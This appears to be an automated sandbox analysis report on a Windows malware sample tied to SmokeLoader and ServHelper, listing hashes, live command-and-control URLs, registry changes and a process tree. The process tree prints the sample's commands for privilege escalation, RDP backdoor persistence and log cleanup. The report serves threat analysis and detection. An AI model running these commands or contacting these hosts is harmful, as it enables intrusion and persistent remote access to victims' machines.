Analysis
-
max time kernel
151s -
max time network
137s -
submitted
01-01-1970 00:00
Static task
static1
Behavioral task
behavioral1
Sample
1aefb12a57b41d13f2085ca72e5e4c9d57b6a9b4c73cebad9cb56e206d9a89c4.exe
Resource
win10-en-20211014
General
-
Target
1aefb12a57b41d13f2085ca72e5e4c9d57b6a9b4c73cebad9cb56e206d9a89c4.exe
-
Size
184KB
-
MD5
87e989a0716df97e7a81fb0dd1756cb6
-
SHA1
350a2c2d358568cc4abdd0a79ff403affe47c5ee
-
SHA256
1aefb12a57b41d13f2085ca72e5e4c9d57b6a9b4c73cebad9cb56e206d9a89c4
-
SHA512
948218a3a74685a153a4cfaf066434eb0d113f05adf9810d3faf53b3767985c974c052989d4d9023aedec6cea9989196339077731eab46965a56b8967c48bcc1
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Extracted
smokeloader
2020
http://brandyjaggers.com/upload/
http://andbal.com/upload/
http://alotofquotes.com/upload/
http://szpnc.cn/upload/
http://uggeboots.com/upload/
http://100klv.com/upload/
http://rapmusic.at/upload/
Signatures
-
ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 9 IoCs
flow pid Process 66 1584 powershell.exe 69 1584 powershell.exe 70 1584 powershell.exe 72 1584 powershell.exe 74 1584 powershell.exe 76 1584 powershell.exe 79 1584 powershell.exe 81 1584 powershell.exe 83 1584 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 2 IoCs
pid Process 3084 54F2.exe 3528 686B.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
resource yara_rule behavioral1/files/0x000b00000001aba3-590.dat upx behavioral1/files/0x000b00000001aba4-595.dat upx -
Deletes itself 1 IoCs
pid Process 2960 Process not Found -
Loads dropped DLL 2 IoCs
pid Process 2152 Process not Found 2152 Process not Found -
Drops file in System32 directory 1 IoCs
description ioc Process File created C:\Windows\SysWOW64\rdpclip.exe powershell.exe -
Drops file in Program Files directory 4 IoCs
description ioc Process File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI powershell.exe -
Drops file in Windows directory 24 IoCs
description ioc Process File created C:\Windows\branding\wupsvc.jpg powershell.exe File created C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIF5AA.tmp powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_wlbuzogr.0oh.ps1 powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_xzru4myp.asd.psm1 powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIF5BA.tmp powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIF539.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIF588.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIF599.tmp powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat powershell.exe -
Program crash 1 IoCs
pid pid_target Process procid_target 2972 3528 WerFault.exe 71 -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 1aefb12a57b41d13f2085ca72e5e4c9d57b6a9b4c73cebad9cb56e206d9a89c4.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 1aefb12a57b41d13f2085ca72e5e4c9d57b6a9b4c73cebad9cb56e206d9a89c4.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 1aefb12a57b41d13f2085ca72e5e4c9d57b6a9b4c73cebad9cb56e206d9a89c4.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "My Computer" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\CurrentLevel = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Description = "This zone contains all Web sites you haven't placed in other zones" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "0" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\PMDisplayName = "Trusted sites [Protected Mode]" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\shell = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1200 = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Icon = "inetcpl.cpl#00004481" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Description = "This zone contains all Web sites that are on your organization's intranet." powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Flags = "219" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\LowIcon = "inetcpl.cpl#005423" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\https = "3" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\DisplayName = "Restricted sites" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\16\52C64B7E powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "My Computer [Protected Mode]" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\CurrentLevel = "70912" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\1400 = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "My Computer" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\LowIcon = "inetcpl.cpl#005423" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\DisplayName = "Internet" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Description = "Your computer" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\LowIcon = "inetcpl.cpl#005424" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Flags = "33" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Icon = "inetcpl.cpl#00004480" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0\2ba02e083fadee33 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c004900450035005f00550041005f004200610063006b00750070005f0046006c00610067002c0000000100080035002e0030000000000000000000 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2 powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Flags = "219" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\SelfHealCount = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\CurrentLevel = "66816" powershell.exe -
Modifies registry key 1 TTPs 2 IoCs
pid Process 2668 reg.exe 3376 reg.exe -
Runs net.exe
-
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 74 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 69 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 70 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 72 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2700 1aefb12a57b41d13f2085ca72e5e4c9d57b6a9b4c73cebad9cb56e206d9a89c4.exe 2700 1aefb12a57b41d13f2085ca72e5e4c9d57b6a9b4c73cebad9cb56e206d9a89c4.exe 2960 Process not Found 2960 Process not Found 2960 Process not Found 2960 Process not Found 2960 Process not Found 2960 Process not Found 2960 Process not Found 2960 Process not Found 2960 Process not Found 2960 Process not Found 2960 Process not Found 2960 Process not Found 2960 Process not Found 2960 Process not Found 2960 Process not Found 2960 Process not Found 2960 Process not Found 2960 Process not Found 2960 Process not Found 2960 Process not Found 2960 Process not Found 2960 Process not Found 2960 Process not Found 2960 Process not Found 2960 Process not Found 2960 Process not Found 2960 Process not Found 2960 Process not Found 2960 Process not Found 2960 Process not Found 2960 Process not Found 2960 Process not Found 2960 Process not Found 2960 Process not Found 2960 Process not Found 2960 Process not Found 2960 Process not Found 2960 Process not Found 2960 Process not Found 2960 Process not Found 2960 Process not Found 2960 Process not Found 2960 Process not Found 2960 Process not Found 2960 Process not Found 2960 Process not Found 2960 Process not Found 2960 Process not Found 2960 Process not Found 2960 Process not Found 2960 Process not Found 2960 Process not Found 2960 Process not Found 2960 Process not Found 2960 Process not Found 2960 Process not Found 2960 Process not Found 2960 Process not Found 2960 Process not Found 2960 Process not Found 2960 Process not Found 2960 Process not Found -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 2960 Process not Found -
Suspicious behavior: LoadsDriver 3 IoCs
pid Process 628 Process not Found 628 Process not Found 628 Process not Found -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 2700 1aefb12a57b41d13f2085ca72e5e4c9d57b6a9b4c73cebad9cb56e206d9a89c4.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1412 powershell.exe Token: SeDebugPrivilege 1516 powershell.exe Token: SeDebugPrivilege 3228 powershell.exe Token: SeIncreaseQuotaPrivilege 1516 powershell.exe Token: SeSecurityPrivilege 1516 powershell.exe Token: SeTakeOwnershipPrivilege 1516 powershell.exe Token: SeLoadDriverPrivilege 1516 powershell.exe Token: SeSystemProfilePrivilege 1516 powershell.exe Token: SeSystemtimePrivilege 1516 powershell.exe Token: SeProfSingleProcessPrivilege 1516 powershell.exe Token: SeIncBasePriorityPrivilege 1516 powershell.exe Token: SeCreatePagefilePrivilege 1516 powershell.exe Token: SeBackupPrivilege 1516 powershell.exe Token: SeRestorePrivilege 1516 powershell.exe Token: SeShutdownPrivilege 1516 powershell.exe Token: SeDebugPrivilege 1516 powershell.exe Token: SeSystemEnvironmentPrivilege 1516 powershell.exe Token: SeRemoteShutdownPrivilege 1516 powershell.exe Token: SeUndockPrivilege 1516 powershell.exe Token: SeManageVolumePrivilege 1516 powershell.exe Token: 33 1516 powershell.exe Token: 34 1516 powershell.exe Token: 35 1516 powershell.exe Token: 36 1516 powershell.exe Token: SeDebugPrivilege 2684 powershell.exe Token: SeIncreaseQuotaPrivilege 2684 powershell.exe Token: SeSecurityPrivilege 2684 powershell.exe Token: SeTakeOwnershipPrivilege 2684 powershell.exe Token: SeLoadDriverPrivilege 2684 powershell.exe Token: SeSystemProfilePrivilege 2684 powershell.exe Token: SeSystemtimePrivilege 2684 powershell.exe Token: SeProfSingleProcessPrivilege 2684 powershell.exe Token: SeIncBasePriorityPrivilege 2684 powershell.exe Token: SeCreatePagefilePrivilege 2684 powershell.exe Token: SeBackupPrivilege 2684 powershell.exe Token: SeRestorePrivilege 2684 powershell.exe Token: SeShutdownPrivilege 2684 powershell.exe Token: SeDebugPrivilege 2684 powershell.exe Token: SeSystemEnvironmentPrivilege 2684 powershell.exe Token: SeRemoteShutdownPrivilege 2684 powershell.exe Token: SeUndockPrivilege 2684 powershell.exe Token: SeManageVolumePrivilege 2684 powershell.exe Token: 33 2684 powershell.exe Token: 34 2684 powershell.exe Token: 35 2684 powershell.exe Token: 36 2684 powershell.exe Token: SeDebugPrivilege 2264 powershell.exe Token: SeIncreaseQuotaPrivilege 2264 powershell.exe Token: SeSecurityPrivilege 2264 powershell.exe Token: SeTakeOwnershipPrivilege 2264 powershell.exe Token: SeLoadDriverPrivilege 2264 powershell.exe Token: SeSystemProfilePrivilege 2264 powershell.exe Token: SeSystemtimePrivilege 2264 powershell.exe Token: SeProfSingleProcessPrivilege 2264 powershell.exe Token: SeIncBasePriorityPrivilege 2264 powershell.exe Token: SeCreatePagefilePrivilege 2264 powershell.exe Token: SeBackupPrivilege 2264 powershell.exe Token: SeRestorePrivilege 2264 powershell.exe Token: SeShutdownPrivilege 2264 powershell.exe Token: SeDebugPrivilege 2264 powershell.exe Token: SeSystemEnvironmentPrivilege 2264 powershell.exe Token: SeRemoteShutdownPrivilege 2264 powershell.exe Token: SeUndockPrivilege 2264 powershell.exe Token: SeManageVolumePrivilege 2264 powershell.exe -
Suspicious use of FindShellTrayWindow 5 IoCs
pid Process 2960 Process not Found 2960 Process not Found 2960 Process not Found 2960 Process not Found 2960 Process not Found -
Suspicious use of SendNotifyMessage 9 IoCs
pid Process 2960 Process not Found 2960 Process not Found 2960 Process not Found 2960 Process not Found 2960 Process not Found 2960 Process not Found 2960 Process not Found 2960 Process not Found 2960 Process not Found -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2960 wrote to memory of 3084 2960 Process not Found 69 PID 2960 wrote to memory of 3084 2960 Process not Found 69 PID 2960 wrote to memory of 3528 2960 Process not Found 71 PID 2960 wrote to memory of 3528 2960 Process not Found 71 PID 2960 wrote to memory of 3528 2960 Process not Found 71 PID 3084 wrote to memory of 1412 3084 54F2.exe 72 PID 3084 wrote to memory of 1412 3084 54F2.exe 72 PID 1412 wrote to memory of 820 1412 powershell.exe 74 PID 1412 wrote to memory of 820 1412 powershell.exe 74 PID 820 wrote to memory of 2348 820 csc.exe 75 PID 820 wrote to memory of 2348 820 csc.exe 75 PID 1412 wrote to memory of 1516 1412 powershell.exe 76 PID 1412 wrote to memory of 1516 1412 powershell.exe 76 PID 3528 wrote to memory of 3228 3528 686B.exe 78 PID 3528 wrote to memory of 3228 3528 686B.exe 78 PID 3528 wrote to memory of 3228 3528 686B.exe 78 PID 1412 wrote to memory of 2684 1412 powershell.exe 81 PID 1412 wrote to memory of 2684 1412 powershell.exe 81 PID 1412 wrote to memory of 2264 1412 powershell.exe 83 PID 1412 wrote to memory of 2264 1412 powershell.exe 83 PID 3228 wrote to memory of 3720 3228 powershell.exe 85 PID 3228 wrote to memory of 3720 3228 powershell.exe 85 PID 3228 wrote to memory of 3720 3228 powershell.exe 85 PID 3720 wrote to memory of 3524 3720 csc.exe 86 PID 3720 wrote to memory of 3524 3720 csc.exe 86 PID 3720 wrote to memory of 3524 3720 csc.exe 86 PID 3228 wrote to memory of 2632 3228 powershell.exe 87 PID 3228 wrote to memory of 2632 3228 powershell.exe 87 PID 3228 wrote to memory of 2632 3228 powershell.exe 87 PID 1412 wrote to memory of 3524 1412 powershell.exe 89 PID 1412 wrote to memory of 3524 1412 powershell.exe 89 PID 1412 wrote to memory of 2668 1412 powershell.exe 90 PID 1412 wrote to memory of 2668 1412 powershell.exe 90 PID 1412 wrote to memory of 1516 1412 powershell.exe 91 PID 1412 wrote to memory of 1516 1412 powershell.exe 91 PID 1412 wrote to memory of 3892 1412 powershell.exe 94 PID 1412 wrote to memory of 3892 1412 powershell.exe 94 PID 3892 wrote to memory of 1232 3892 net.exe 95 PID 3892 wrote to memory of 1232 3892 net.exe 95 PID 1412 wrote to memory of 3972 1412 powershell.exe 96 PID 1412 wrote to memory of 3972 1412 powershell.exe 96 PID 3972 wrote to memory of 1848 3972 cmd.exe 97 PID 3972 wrote to memory of 1848 3972 cmd.exe 97 PID 1848 wrote to memory of 2996 1848 cmd.exe 105 PID 1848 wrote to memory of 2996 1848 cmd.exe 105 PID 2996 wrote to memory of 3052 2996 cmd.exe 99 PID 2996 wrote to memory of 3052 2996 cmd.exe 99 PID 1412 wrote to memory of 1648 1412 powershell.exe 100 PID 1412 wrote to memory of 1648 1412 powershell.exe 100 PID 1648 wrote to memory of 1376 1648 cmd.exe 101 PID 1648 wrote to memory of 1376 1648 cmd.exe 101 PID 1376 wrote to memory of 980 1376 cmd.exe 102 PID 1376 wrote to memory of 980 1376 cmd.exe 102 PID 980 wrote to memory of 2896 980 net.exe 103 PID 980 wrote to memory of 2896 980 net.exe 103 PID 2996 wrote to memory of 3720 2996 cmd.exe 107 PID 2996 wrote to memory of 3720 2996 cmd.exe 107 PID 3720 wrote to memory of 1632 3720 net.exe 108 PID 3720 wrote to memory of 1632 3720 net.exe 108 PID 4064 wrote to memory of 1232 4064 cmd.exe 111 PID 4064 wrote to memory of 1232 4064 cmd.exe 111 PID 1232 wrote to memory of 3672 1232 net.exe 112 PID 1232 wrote to memory of 3672 1232 net.exe 112 PID 2972 wrote to memory of 3724 2972 cmd.exe 115
Processes
-
C:\Users\Admin\AppData\Local\Temp\1aefb12a57b41d13f2085ca72e5e4c9d57b6a9b4c73cebad9cb56e206d9a89c4.exe"C:\Users\Admin\AppData\Local\Temp\1aefb12a57b41d13f2085ca72e5e4c9d57b6a9b4c73cebad9cb56e206d9a89c4.exe"1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:2700
-
C:\Users\Admin\AppData\Local\Temp\54F2.exeC:\Users\Admin\AppData\Local\Temp\54F2.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3084 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1412 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ba3hzcvm\ba3hzcvm.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:820 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES78A7.tmp" "c:\Users\Admin\AppData\Local\Temp\ba3hzcvm\CSCFADF3ACD147B44F88084303A989057BD.TMP"4⤵PID:2348
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1516
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2684
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2264
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵PID:3524
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies registry key
PID:2668
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵PID:1516
-
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
PID:3892 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵PID:1232
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
PID:3972 -
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
PID:1848 -
C:\Windows\system32\net.exenet start rdpdr5⤵PID:2996
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵PID:3052
-
-
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵
- Suspicious use of WriteProcessMemory
PID:1648 -
C:\Windows\system32\cmd.execmd /c net start TermService4⤵
- Suspicious use of WriteProcessMemory
PID:1376 -
C:\Windows\system32\net.exenet start TermService5⤵
- Suspicious use of WriteProcessMemory
PID:980 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵PID:2896
-
-
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵PID:2728
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵PID:660
-
-
-
C:\Users\Admin\AppData\Local\Temp\686B.exeC:\Users\Admin\AppData\Local\Temp\686B.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3528 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3228 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zlrlc2p0\zlrlc2p0.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:3720 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESAD72.tmp" "c:\Users\Admin\AppData\Local\Temp\zlrlc2p0\CSC6311CB3D77FD413EB416FBD644A581CB.TMP"4⤵PID:3524
-
-
-
